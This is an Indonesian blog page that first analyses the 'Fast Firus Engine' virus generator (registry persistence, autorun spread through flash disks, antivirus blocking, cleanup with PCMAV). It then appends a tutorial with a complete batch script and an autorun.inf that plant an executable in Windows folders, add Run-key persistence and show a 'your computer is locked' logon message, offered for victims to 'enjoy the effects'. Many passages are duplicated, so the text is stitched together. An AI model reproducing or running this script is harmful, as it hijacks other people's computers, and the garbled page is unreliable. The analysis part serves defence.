Masih ingat
dengan virus Aksika? Virus “open source” yang satu itu memang memiliki banyak
sekali varian. Tidak heran karena source code-nya memang disedia kan bebas di
Internet, jadi siapapun dapat dengan mudah mengubah dan meng-compile source
code-nya dan jadilah varian baru.
Berawal dari kemudahan itulah, banyak virus maker ataupun
programer pemula mencoba–coba untuk membuat virus tanpa perlu repot. Paling
yang dibutuhkan hanyalah pengetahuan seputar operating system dan programming.
Namun kemudahan itu belum seberapa, bila dibandingkan dengan
menggunakan program Virus Generator. Dari namanya saja, kita sudah dapat
mengira kegunaan dari program tersebut. Ya, Virus Generator merupakan program
untuk dapat membuat virus secara mudah dan instan.
Bermula dari sampel sebuah virus yang lumayan banyak
dikirimkan oleh pembaca kepada kami. PC Media Antivirus mengenalnya dengan nama
Gen.FFE-Fajar, namun antivirus lain ada juga yang menyebutnya dengan nama
Brontok.D. Dengan penyelidikan sederhana akhirnya diketahui bahwa virus
tersebut dibuat menggunakan Virus Generator.
Fast Firus Engine (FFE)
Pembuat Generator tersebut menamakan program buatannya itu dengan nama Fast Firus Engine. Seperti yang terlihat pada program ataupun situs pembuatnya, ia memberitahukan bahwa program ini hanya untuk tujuan pembelajaran dan tidak untuk tindakan merusak. Namun tetap saja, bila program ini sudah jatuh ke tangan yang salah, pasti akan digunakan untuk pengrusakan.
Pembuat Generator tersebut menamakan program buatannya itu dengan nama Fast Firus Engine. Seperti yang terlihat pada program ataupun situs pembuatnya, ia memberitahukan bahwa program ini hanya untuk tujuan pembelajaran dan tidak untuk tindakan merusak. Namun tetap saja, bila program ini sudah jatuh ke tangan yang salah, pasti akan digunakan untuk pengrusakan.
Virus Generator ini dibuat menggunakan bahasa Visual Basic
dan di-compress menggunakan packer tELock. Dalam paketnya terdapat dua buah
file, yakni Fast Firus Engine.exe dan data.ex_. Fast Firus Engine. exe
merupakan program utama dalam pembuatan virusnya dan sementara file data.ex_
sebenarnya merupakan badan virus asli yang belum dimodifi kasi.
Saat file Fast Firus Engine.exe dijalankan, maka pengguna
akan dihadapkan pada sebuah interface. Anda hanya disuruh mengisikan nama
virus, nama pembuat, dan pesan-pesannya. Lalu dengan menekan tombol Generate,
maka jadilah virus Anda.
Cara kerja dari Generator tersebut sebenarnya sangat
sederhana. Ia hanya menambahkan data yang Anda masukkan tadi ke bagian akhir
file virus asli (data.ex_). Nantinya informasi tersebut digunakan oleh virus
dalam proses infeksi.
Bagaimana Virus Menginfeksi?
Virus hasil ciptaan FFE memang terlihat sederhana. Sama seperti Generatornya, ia juga dibuat menggunakan bahasa Visual Basic yang di-compile dengan metode Native- Code. Lalu di compress menggunakan tELock agar ukurannya semakin kecil. Virus ini memiliki ukuran tubuh asli sebesar 55.296 bytes.
Virus hasil ciptaan FFE memang terlihat sederhana. Sama seperti Generatornya, ia juga dibuat menggunakan bahasa Visual Basic yang di-compile dengan metode Native- Code. Lalu di compress menggunakan tELock agar ukurannya semakin kecil. Virus ini memiliki ukuran tubuh asli sebesar 55.296 bytes.
Saat virus kali pertama dieksekusi, ia akan membuat beberapa
file induk di beberapa lokasi. Seperti di direktori \%WINDOWS%\, akan terdapat
file dengan nama.exe, Win32 exe, activex.exe, dan %virusname% (nama virus
sesuai yang diisikan oleh sang pembuatnya pada Generator). Di \%WINDOWS%\
%system32%\ akan terdapat file copy.pif, _default.pif, dan surif.bin. Selain
itu, ia juga mengubah atau membuat file Oeminfo.ini yang merupakan bagian dari
System Properties. Jadi apabila komputer Anda terinfeksi oleh virus hasil
generate dari FFE, maka pada System Properties akan terdapat tulisan “Generated
by Fast Firus Engine”.
Di direktori \%WINDOWS%\%System%\ akan terdapat beberapa
file induk lagi yang menggunakan nama yang sama seperti file system milik
Windows, seperti csrss.exe, winlogon.exe, lsass.exe, smss.exe, svchost. exe,
dan winlogon.exe.
Dan tak lupa, pada root drive pun akan terdapat file dengan
nama “baca euy.txt” yang berisikan pesan–pesan dari si pembuat virus. Jadi pada
saat membuat virus dengan menggunakan Generator tersebut, maka pembuatnya akan
disuguhkan beberapa kotak input, seperti Author of the virus, Name of the
virus, dan Messages. Nah, isi dari kotak messages ini yang nantinya ditampilkan
pada file “baca euy.txt” tersebut.
Setelah virus berhasil meng-copy-kan file induknya ke dalam
sistem tersebut, ia akan menjalankan file induk tadi, sehingga pada memory akan
terdapat beberapa process virus, seperti csrss.exe, winlogon.exe, lsass. exe,
smss.exe, svchost.exe, dan winlogon.exe. Nama process yang mirip dengan
process/services milik Windows tersebut mungkin sengaja untuk mengecoh user.
Untuk membedakannya, Anda dapat melihat path atau lokasi process tersebut
dijalankan. Process virus ini biasanya berjalan di direktori System sementara
process/services milik Windows yang running biasanya berasal dari direktori
System32.
Mengubah Registry
Virus ini menambahkan beberapa item startup pada registry agar pada saat memulai Windows ia dapat running secara otomatis atau untuk mengubah setting-an Windows agar sesuai keinginannya. Informasi mengenai registry yang diubahnya tidak akan dapat dengan mudah kita lihat karena dalam kondisi terenkripsi.
Yang ia ubah adalah seperti nilai dari item Userinit, yakni
dengan menambahkan parameter ke file induk. Pada key HKEY_CURRENT_
USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load juga akan diubah
itemnya agar mengarah ke file induknya dengan nama Activex.exe. Pada
HKEY_CURRENT_USER \Software\Microsoft\ Windows\CurrentVersion\Run\ akan
terdapat item baru dengan nama present. Key HKEY_
LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run\ akan terdapat
item baru juga dengan nama Default dan %username%, username di sini merupakan
nama user yang sedang aktif saat itu.
Virus hasil generate dari FFE juga mengubah shell extension
untuk file .exe, yakni dengan mengubah type information dari Application
menjadi File Folder. Setting-an folder Options juga diubah agar tidak
menampilkan extension dan setiap fi le dengan attribut hidden. Dan agar dapat
aktif pada safe-mode, ia pun mengubah nilai dari item SafeBoot.
Dengan menggunakan bantuan registry Image File Execution
Options, virus ini juga menambahkan item baru pada section tersebut dengan nama
cmd.exe, msconfi g.exe, regedit.exe, dan taskmgr.exe. Maksudnya adalah agar
setiap user yang mengakses program dengan nama file seperti itu, maka akan
di-bypass oleh Windows dan dialihkan ke file induk si virus.
Bagaimana Virus Menyebar?
Virus ini dapat menyebar melalui media penyimpan data seperti flash disk. Saat Anda mencolokkan flash disk pada komputer yang terinfeksi, maka pada flash disk tersebut akan terdapat beberapa file baru, seperti explorer.exe, %virusname%.exe, dan msvbvm60.dll. Juga beberapa file pendukung seperti desktop.ini, autorun.inf agar ia dapat running otomatis pada saat mengakses flash disk tersebut.
Virus ini dapat menyebar melalui media penyimpan data seperti flash disk. Saat Anda mencolokkan flash disk pada komputer yang terinfeksi, maka pada flash disk tersebut akan terdapat beberapa file baru, seperti explorer.exe, %virusname%.exe, dan msvbvm60.dll. Juga beberapa file pendukung seperti desktop.ini, autorun.inf agar ia dapat running otomatis pada saat mengakses flash disk tersebut.
File virus lainnya pun disimpan pada direktori baru di flash
disk tersebut dengan nama Recycled yang berisikan file Firus.pif dan
Folder.htt. Kesemua file virus tersebut dalam kondisi hidden sehingga tidak
terlihat.
Virus Beraksi
Untuk dapat bertahan hidup, virus ini pun akan mencoba untuk memblok setiap program yang tidak ia inginkan seperti tools atau program antivirus termasuk PCMAV. Sama seperti halnya data registry yang diubah, data mengenai program apa saja yang diblok olehnya juga terdapat dalam tubuhnya dalam kondisi terenkripsi.
Untuk dapat bertahan hidup, virus ini pun akan mencoba untuk memblok setiap program yang tidak ia inginkan seperti tools atau program antivirus termasuk PCMAV. Sama seperti halnya data registry yang diubah, data mengenai program apa saja yang diblok olehnya juga terdapat dalam tubuhnya dalam kondisi terenkripsi.
Jadi, saat virus sudah stay di memory, ia akan memonitor
setiap program yang diakses oleh user, yakni dengan membaca nama file dan juga
caption Window. Beberapa nama file antivirus yang dicoba untuk dibloknya adalah
nav.exe, avgcc.exe, njeeves.exe, ccapps.exe, ccapp.exe, kav.exe, nvcoas.exe,
avp32.exe, dan masih banyak lagi yang lainnya. Termasuk beberapa program setup
atau installer juga tidak dapat dijalankan pada komputer terinfeksi.
Pencegahan dan
Penanggulangan
PC Media Antivirus RC19 ini dapat membersihkan komputer terinfeksi secara tuntas dan akurat 100% setiap virus yang dibuat dengan menggunakan Fast Firus Generator. Untuk menghindari aksi blok oleh virus terhadap PCMAV, silakan Anda rename terlebih dahulu file PCMAV misalnya PCMAV-CLN.EXE menjadi MERDEKA.EXE.
*Cara Membuat Virus melalui Notepad *
PC Media Antivirus RC19 ini dapat membersihkan komputer terinfeksi secara tuntas dan akurat 100% setiap virus yang dibuat dengan menggunakan Fast Firus Generator. Untuk menghindari aksi blok oleh virus terhadap PCMAV, silakan Anda rename terlebih dahulu file PCMAV misalnya PCMAV-CLN.EXE menjadi MERDEKA.EXE.
*Cara Membuat Virus melalui Notepad *
caranya:
- buka notepad lalu tulis(atau copy paste…tapi di edit dulu yaaa… ) script di bawah ini:
- buka notepad lalu tulis(atau copy paste…tapi di edit dulu yaaa… ) script di bawah ini:
@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f
- lalu di SAVE AS ALL FILES dengan exstensi .bat
(nama_file.bat)
- buat Autorun.inf dengan script:
- buat Autorun.inf dengan script:
[autorun]
open=nama_file.bat
open=nama_file.bat
- lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)
- file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY
- copy file-file tsb ke CD
- nikmati efeknya
- file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY
- copy file-file tsb ke CD
- nikmati efeknya
note:
- jangan disalahgunakan
- maaf kalau pernah diposting
- maaf lagi kalau salah tempat untuk posting,….maklum member baru and masih amatir ….
- lagi-lagi maaf kalau ada yang salah, and mohon dikoreksi ….
- kalau mau buat anti virusnya tinggal di modifikasi nilainya….
- jangan disalahgunakan
- maaf kalau pernah diposting
- maaf lagi kalau salah tempat untuk posting,….maklum member baru and masih amatir ….
- lagi-lagi maaf kalau ada yang salah, and mohon dikoreksi ….
- kalau mau buat anti virusnya tinggal di modifikasi nilainya….
0 komentar:
Posting Komentar